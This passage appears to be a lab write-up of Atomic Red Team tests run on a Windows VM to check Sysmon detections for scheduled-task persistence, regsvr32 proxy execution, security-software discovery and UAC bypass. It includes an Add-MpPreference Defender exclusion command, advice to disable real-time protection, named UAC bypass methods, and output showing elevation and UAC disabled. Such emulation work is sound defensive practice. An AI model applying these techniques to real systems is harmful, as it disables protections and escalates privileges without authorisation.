GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"` Prereq successfully met: GhostTask.exe tool from netero101 must exist in the ExternalPayloads directory. This tool may be quarantined by windows defender; disable windows defender real-time protection to fix it or add the ExternalPayloads directory as an exclusion, using a command like `Add-MpPreference -ExclusionPath "C:\AtomicRedTeam\atomics\..\ExternalPayloads\"` ```

Test run

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1053.005-1 Scheduled Task Startup Script SUCCESS: The scheduled task "T1053_005_OnLogon" has successfully been created. SUCCESS: The scheduled task "T1053_005_OnStartup" has successfully been created. Exit code: 0 Done executing test: T1053.005-1 Scheduled Task Startup Script Executing test: T1053.005-2 Scheduled task Local SUCCESS: The scheduled task "spawn" has successfully been created. Exit code: 0 Done executing test: T1053.005-2 Scheduled task Local Executing test: T1053.005-3 Scheduled task Remote ERROR: No mapping between account names and security IDs was done. Exit code: 1 Done executing test: T1053.005-3 Scheduled task Remote Executing test: T1053.005-4 Powershell Cmdlet Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTask Ready Exit code: 0 Done executing test: T1053.005-4 Powershell Cmdlet Scheduled Task Executing test: T1053.005-5 Task Scheduler via VBA New-Object : Retrieving the COM class factory for component with CLSID {00000000-0000-0000-0000-000000000000} failed At line:70 char:12 due to the following error: 80040154 Class not registered (Exception from HRESULT: 0x80040154 (REGDB_E_CLASSNOTREG)). + $app = New-Object -ComObject "$officeProduct.Application" + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ResourceUnavailable: (:) [New-Object], COMException + FullyQualifiedErrorId : NoCOMClassIdentified,Microsoft.PowerShell.Commands.NewObjectCommand New-Item : The registry key at the specified path does not exist. At line:73 char:34 + if (-not (Test-Path $key)) { New-Item $Key } + ~~~~~~~~~~~~~ n + CategoryInfo : InvalidArgument: (HKEY_CURRENT_US...oft\Office\Word:String) [New-Item], ArgumentExceptio + FullyQualifiedErrorId : System.ArgumentException,Microsoft.PowerShell.Commands.NewItemCommand Set-ItemProperty : Cannot find path 'HKCU:\Software\Microsoft\Office\Word\Security\' because it does not exist. At line:74 char:5 + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (HKCU:\Software\...\Word\Security\:String) [Set-ItemProperty], ItemNotFo undException + FullyQualifiedErrorId : PathNotFound,Microsoft.PowerShell.Commands.SetItemPropertyCommand You cannot call a method on a null-valued expression. At line:84 char:9 + $doc = $app.Documents.Add() + ~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:89 char:5 + $comp = $doc.VBProject.VBComponents.Add(1) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:90 char:5 + $comp.CodeModule.AddFromString($macroCode) + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:91 char:5 + $app.Run($sub) + ~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:92 char:5 + $doc.Close(0) + ~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull You cannot call a method on a null-valued expression. At line:93 char:5 + ~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [], RuntimeException + FullyQualifiedErrorId : InvokeMethodOnNull + $app.Quit() Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:94 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:95 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exception calling "ReleaseComObject" with "1" argument(s): "Object reference not set to an instance of an object." At line:96 char:5 + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : NullReferenceException Exit code: 0 Done executing test: T1053.005-5 Task Scheduler via VBA Executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "T1053_005_WMI", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry The operation completed successfully. SUCCESS: The scheduled task "ATOMIC-T1053.005" has successfully been created. Exit code: 0 Done executing test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry Executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute cmdletOutput ReturnValue PSComputerName ------------ ----------- -------------- MSFT_ScheduledTask (TaskName = "atomic red team", TaskPath = "\") 0 Exit code: 0 Done executing test: T1053.005-8 Import XML Schedule Task with Hidden Attribute Executing test: T1053.005-9 PowerShell Modify A Scheduled Task TaskPath TaskName State -------- -------- ----- \ AtomicTaskModifed Ready \ AtomicTaskModifed Ready Exit code: 0 Done executing test: T1053.005-9 PowerShell Modify A Scheduled Task Executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation The filename, directory name, or volume label syntax is incorrect. Exit code: 1 Done executing test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation PS C:\Users\vagrant\Desktop> ```

Cleanup

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1053.005 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1053.005-1 Scheduled Task Startup Script Done executing cleanup for test: T1053.005-1 Scheduled Task Startup Script Executing cleanup for test: T1053.005-2 Scheduled task Local Done executing cleanup for test: T1053.005-2 Scheduled task Local Executing cleanup for test: T1053.005-3 Scheduled task Remote Done executing cleanup for test: T1053.005-3 Scheduled task Remote Executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task Done executing cleanup for test: T1053.005-4 Powershell Cmdlet Scheduled Task Executing cleanup for test: T1053.005-5 Task Scheduler via VBA Unregister-ScheduledTask : No MSFT_ScheduledTask objects found with property 'TaskName' equal to 'Run Notepad'. + & {Unregister-ScheduledTask -TaskName "Run Notepad" -Confirm:$false} At line:1 char:4 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + FullyQualifiedErrorId : CmdletizationQuery_NotFound_TaskName,Unregister-ScheduledTask + CategoryInfo : ObjectNotFound: (Run Notepad:String) [Unregister-ScheduledTask], CimJobException Verify the value of the property and retry. Done executing cleanup for test: T1053.005-5 Task Scheduler via VBA Executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Done executing cleanup for test: T1053.005-6 WMI Invoke-CimMethod Scheduled Task Executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry Done executing cleanup for test: T1053.005-7 Scheduled Task Executing Base64 Encoded Commands From Registry Executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute Done executing cleanup for test: T1053.005-8 Import XML Schedule Task with Hidden Attribute Executing cleanup for test: T1053.005-9 PowerShell Modify A Scheduled Task Done executing cleanup for test: T1053.005-9 PowerShell Modify A Scheduled Task Executing cleanup for test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation The filename, directory name, or volume label syntax is incorrect. Done executing cleanup for test: T1053.005-10 Scheduled Task ("Ghost Task") via Registry Key Manipulation ```

Sysmon event log


Dashboard alert

 

T1218.010 – Signed Binary Proxy Execution: Regsvr32

GetPrereqs

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1218.010-1 Regsvr32 local COM scriptlet execution Attempting to satisfy prereq: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct) Prereq already met: Regsvr32.sct must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\src\RegSvr32.sct) GetPrereq's for: T1218.010-2 Regsvr32 remote COM scriptlet execution No Preqs Defined GetPrereq's for: T1218.010-3 Regsvr32 local DLL execution Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) GetPrereq's for: T1218.010-4 Regsvr32 Registering Non DLL Attempting to satisfy prereq: Test requires a renamed dll file 1 file(s) copied. Prereq successfully met: Test requires a renamed dll file GetPrereq's for: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Attempting to satisfy prereq: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) Prereq already met: AllTheThingsx86.dll must exist on disk at specified location (C:\AtomicRedTeam\atomics\T1218.010\bin\AllTheThingsx86.dll) ```

Test run

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1218.010-1 Regsvr32 local COM scriptlet execution Exit code: 5 Done executing test: T1218.010-1 Regsvr32 local COM scriptlet execution Executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution Exception calling "Start" with "0" argument(s): "Access is denied" At C:\AtomicRedTeam\invoke-atomicredteam\Private\Invoke-Process.ps1:45 char:17 + $process.Start() > $null + ~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [], MethodInvocationException + FullyQualifiedErrorId : Win32Exception Exit code: Done executing test: T1218.010-2 Regsvr32 remote COM scriptlet execution Executing test: T1218.010-3 Regsvr32 local DLL execution Exit code: 0 Done executing test: T1218.010-3 Regsvr32 local DLL execution Executing test: T1218.010-4 Regsvr32 Registering Non DLL Exit code: 0 Done executing test: T1218.010-4 Regsvr32 Registering Non DLL Executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Exit code: 0 Done executing test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer ```

Cleanup

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1218.010 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution Done executing cleanup for test: T1218.010-1 Regsvr32 local COM scriptlet execution Executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution Done executing cleanup for test: T1218.010-2 Regsvr32 remote COM scriptlet execution Executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution Done executing cleanup for test: T1218.010-3 Regsvr32 local DLL execution Executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL Done executing cleanup for test: T1218.010-4 Regsvr32 Registering Non DLL Executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer Done executing cleanup for test: T1218.010-5 Regsvr32 Silent DLL Install Call DllRegisterServer ```

Sysmon event log


Dashboard event

 

T1518.001 – Software Discovery: Security Software Discovery

GetPrereqs

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1518.001 -GetPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics GetPrereq's for: T1518.001-1 Security Software Discovery No Preqs Defined GetPrereq's for: T1518.001-2 Security Software Discovery - powershell No Preqs Defined GetPrereq's for: T1518.001-6 Security Software Discovery - Sysmon Service No Preqs Defined GetPrereq's for: T1518.001-7 Security Software Discovery - AV Discovery via WMI No Preqs Defined GetPrereq's for: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets No Preqs Defined GetPrereq's for: T1518.001-9 Security Software Discovery - Windows Defender Enumeration No Preqs Defined GetPrereq's for: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration No Preqs Defined PS C:\Users\vagrant\Desktop> ```

Test run

OutputFile.log

Cleanup

```console PS C:\Users\vagrant\Desktop> Invoke-AtomicTest T1518.001 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1518.001-1 Security Software Discovery Done executing cleanup for test: T1518.001-1 Security Software Discovery Executing cleanup for test: T1518.001-2 Security Software Discovery - powershell Done executing cleanup for test: T1518.001-2 Security Software Discovery - powershell Executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service Done executing cleanup for test: T1518.001-6 Security Software Discovery - Sysmon Service Executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI Done executing cleanup for test: T1518.001-7 Security Software Discovery - AV Discovery via WMI Executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets Done executing cleanup for test: T1518.001-8 Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets Executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration Done executing cleanup for test: T1518.001-9 Security Software Discovery - Windows Defender Enumeration Executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration Done executing cleanup for test: T1518.001-10 Security Software Discovery - Windows Firewall Enumeration ```

Sysmon event log


Dashboard event

 

T1548.002 – Abuse Elevation Control Mechanism: Bypass User Account Control

GetPrereqs

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -CheckPrereqs PathToAtomicsFolder = C:\AtomicRedTeam\atomics CheckPrereq's for: T1548.002-1 Bypass UAC using Event Viewer (cmd) Prerequisites met: T1548.002-1 Bypass UAC using Event Viewer (cmd) CheckPrereq's for: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Prerequisites met: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) CheckPrereq's for: T1548.002-3 Bypass UAC using Fodhelper Prerequisites met: T1548.002-3 Bypass UAC using Fodhelper CheckPrereq's for: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Prerequisites met: T1548.002-4 Bypass UAC using Fodhelper - PowerShell CheckPrereq's for: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Prerequisites met: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) CheckPrereq's for: T1548.002-6 Bypass UAC by Mocking Trusted Directories Prerequisites met: T1548.002-6 Bypass UAC by Mocking Trusted Directories CheckPrereq's for: T1548.002-7 Bypass UAC using sdclt DelegateExecute Prerequisites met: T1548.002-7 Bypass UAC using sdclt DelegateExecute CheckPrereq's for: T1548.002-8 Disable UAC using reg.exe Prerequisites met: T1548.002-8 Disable UAC using reg.exe CheckPrereq's for: T1548.002-9 Bypass UAC using SilentCleanup task Prerequisites met: T1548.002-9 Bypass UAC using SilentCleanup task CheckPrereq's for: T1548.002-10 UACME Bypass Method 23 Prerequisites met: T1548.002-10 UACME Bypass Method 23 CheckPrereq's for: T1548.002-11 UACME Bypass Method 31 Prerequisites met: T1548.002-11 UACME Bypass Method 31 CheckPrereq's for: T1548.002-12 UACME Bypass Method 33 Prerequisites met: T1548.002-12 UACME Bypass Method 33 CheckPrereq's for: T1548.002-13 UACME Bypass Method 34 Prerequisites met: T1548.002-13 UACME Bypass Method 34 CheckPrereq's for: T1548.002-14 UACME Bypass Method 39 Prerequisites met: T1548.002-14 UACME Bypass Method 39 CheckPrereq's for: T1548.002-15 UACME Bypass Method 56 Prerequisites met: T1548.002-15 UACME Bypass Method 56 CheckPrereq's for: T1548.002-16 UACME Bypass Method 59 Prerequisites met: T1548.002-16 UACME Bypass Method 59 CheckPrereq's for: T1548.002-17 UACME Bypass Method 61 Prerequisites met: T1548.002-17 UACME Bypass Method 61 CheckPrereq's for: T1548.002-18 WinPwn - UAC Magic Prerequisites met: T1548.002-18 WinPwn - UAC Magic CheckPrereq's for: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Prerequisites met: T1548.002-19 WinPwn - UAC Bypass ccmstp technique CheckPrereq's for: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Prerequisites met: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique CheckPrereq's for: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Prerequisites met: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique CheckPrereq's for: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Prerequisites met: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key CheckPrereq's for: T1548.002-23 UAC Bypass with WSReset Registry Modification Prerequisites met: T1548.002-23 UAC Bypass with WSReset Registry Modification CheckPrereq's for: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Prerequisites met: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key CheckPrereq's for: T1548.002-25 Disable UAC notification via registry keys Prerequisites met: T1548.002-25 Disable UAC notification via registry keys CheckPrereq's for: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys Prerequisites met: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Test run

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout The operation completed successfully. (c) Microsoft Corporation. All rights reserved. Microsoft Windows [Version 10.0.20348.2322] C:\Users\vagrant\AppData\Local\Temp> Exit code: 0 Done executing test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\mscfile\shell\open Name Property ---- -------- command Exit code: 0 Done executing test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing test: T1548.002-3 Bypass UAC using Fodhelper The operation completed successfully. The operation completed successfully. Exit code: 0 Done executing test: T1548.002-3 Bypass UAC using Fodhelper Executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Hive: HKEY_CURRENT_USER\software\classes\ms-settings\shell\open Name Property ---- -------- command DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\software\classes\ms-settings\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Exit code: 0 Done executing test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories 1 file(s) copied. symbolic link created for c:\testbypass.exe <<===>> \\?\C:\Windows \System32\mmc.exe Exit code: 0 Done executing test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Hive: HKEY_CURRENT_USER\Software\Classes\Folder\shell\open Name Property ---- -------- command (default) : cmd.exe /c notepad.exe DelegateExecute : PSPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open\command PSParentPath : Microsoft.PowerShell.Core\Registry::HKEY_CURRENT_USER\Software\Classes\Folder\shell\open PSChildName : command PSDrive : HKCU PSProvider : Microsoft.PowerShell.Core\Registry Start-Process : This command cannot be run due to the error: The system cannot find the file specified. At line:3 char:1 + Start-Process -FilePath $env:windir\system32\sdclt.exe + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (:) [Start-Process], InvalidOperationException + FullyQualifiedErrorId : InvalidOperationException,Microsoft.PowerShell.Commands.StartProcessCommand Exit code: 0 Done executing test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Exit code: 0 Done executing test: T1548.002-8 Disable UAC using reg.exe Executing test: T1548.002-9 Bypass UAC using SilentCleanup task The screen cannot be set to the number of lines and columns specified. The operation completed successfully. Exit code: 0 Done executing test: T1548.002-9 Bypass UAC using SilentCleanup task Executing test: T1548.002-10 UACME Bypass Method 23 Process Timed out after 120 seconds, use '-TimeoutSeconds' to specify a different timeout Exit code: -1 Done executing test: T1548.002-10 UACME Bypass Method 23 Executing test: T1548.002-11 UACME Bypass Method 31 Exit code: -1073741637 Done executing test: T1548.002-11 UACME Bypass Method 31 Executing test: T1548.002-12 UACME Bypass Method 33 Exit code: -1073741637 Done executing test: T1548.002-12 UACME Bypass Method 33 Executing test: T1548.002-13 UACME Bypass Method 34 Exit code: -1073741637 Done executing test: T1548.002-13 UACME Bypass Method 34 Executing test: T1548.002-14 UACME Bypass Method 39 Exit code: -1073741637 Done executing test: T1548.002-14 UACME Bypass Method 39 Executing test: T1548.002-15 UACME Bypass Method 56 Exit code: -1073741637 Done executing test: T1548.002-15 UACME Bypass Method 56 Executing test: T1548.002-16 UACME Bypass Method 59 Exit code: -1073741637 Done executing test: T1548.002-16 UACME Bypass Method 59 Executing test: T1548.002-17 UACME Bypass Method 61 Exit code: -1073741637 Done executing test: T1548.002-17 UACME Bypass Method 61 Executing test: T1548.002-18 WinPwn - UAC Magic Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/28/2024 2:51 AM LocalRecon d----- 2/28/2024 2:51 AM DomainRecon Directory: C:\Users\vagrant\AppData\Local\Temp\DomainRecon Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/28/2024 2:51 AM ADrecon Directory: C:\Users\vagrant\AppData\Local\Temp Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 2/28/2024 2:51 AM LocalPrivEsc d----- 2/28/2024 2:51 AM Exploitation d----- 2/28/2024 2:51 AM Vulnerabilities __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass [!] Session is elevated! Exit code: 0 Done executing test: T1548.002-18 WinPwn - UAC Magic Executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName ------- ------ ----- ----- ------ -- -- ----------- 61 5 636 2616 0.03 3828 1 cmstp True True Process : cmstp Hwnd : 3343146 Exit code: 0 Done executing test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Creating/Checking Log Folders in C:\Users\vagrant\AppData\Local\Temp directory: __ ___ ____ \ \ / (_)_ __ | _ \__ ___ __ \ \ /\ / /| | '_ \| |_) \ \ /\ / | '_ \ \ V V / | | | | | __/ \ V V /| | | | \_/\_/ |_|_| |_|_| \_/\_/ |_| |_| --> UAC Bypass Exit code: 0 Done executing test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Exit code: 0 Done executing test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Exit code: 0 Done executing test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Exit code: 0 Done executing test: T1548.002-23 UAC Bypass with WSReset Registry Modification Executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Exit code: 0 Done executing test: T1548.002-24 Disable UAC - Switch to the secure desktop when prompting for elevation via registry key Executing test: T1548.002-25 Disable UAC notification via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-25 Disable UAC notification via registry keys Executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys The operation completed successfully. Exit code: 0 Done executing test: T1548.002-26 Disable ConsentPromptBehaviorAdmin via registry keys ```

Cleanup

```console PS C:\Users\vagrant\Desktop\Sysmon> Invoke-AtomicTest T1548.002 -Cleanup PathToAtomicsFolder = C:\AtomicRedTeam\atomics Executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Done executing cleanup for test: T1548.002-1 Bypass UAC using Event Viewer (cmd) Executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Done executing cleanup for test: T1548.002-2 Bypass UAC using Event Viewer (PowerShell) Executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Done executing cleanup for test: T1548.002-3 Bypass UAC using Fodhelper Executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Done executing cleanup for test: T1548.002-4 Bypass UAC using Fodhelper - PowerShell Executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Done executing cleanup for test: T1548.002-5 Bypass UAC using ComputerDefaults (PowerShell) Executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Done executing cleanup for test: T1548.002-6 Bypass UAC by Mocking Trusted Directories Executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Done executing cleanup for test: T1548.002-7 Bypass UAC using sdclt DelegateExecute Executing cleanup for test: T1548.002-8 Disable UAC using reg.exe The operation completed successfully. Done executing cleanup for test: T1548.002-8 Disable UAC using reg.exe Executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Done executing cleanup for test: T1548.002-9 Bypass UAC using SilentCleanup task Executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Done executing cleanup for test: T1548.002-10 UACME Bypass Method 23 Executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Done executing cleanup for test: T1548.002-11 UACME Bypass Method 31 Executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Done executing cleanup for test: T1548.002-12 UACME Bypass Method 33 Executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Done executing cleanup for test: T1548.002-13 UACME Bypass Method 34 Executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Done executing cleanup for test: T1548.002-14 UACME Bypass Method 39 Executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Done executing cleanup for test: T1548.002-15 UACME Bypass Method 56 Executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Done executing cleanup for test: T1548.002-16 UACME Bypass Method 59 Executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Done executing cleanup for test: T1548.002-17 UACME Bypass Method 61 Executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Done executing cleanup for test: T1548.002-18 WinPwn - UAC Magic Executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Done executing cleanup for test: T1548.002-19 WinPwn - UAC Bypass ccmstp technique Executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Done executing cleanup for test: T1548.002-20 WinPwn - UAC Bypass DiskCleanup technique Executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Done executing cleanup for test: T1548.002-21 WinPwn - UAC Bypass DccwBypassUAC technique Executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Done executing cleanup for test: T1548.002-22 Disable UAC admin consent prompt via ConsentPromptBehaviorAdmin registry key Executing cleanup for test: T1548.002-23 UAC Bypass with WSReset Registry Modification Done executing cleanup for test: T1548.002-23 UAC 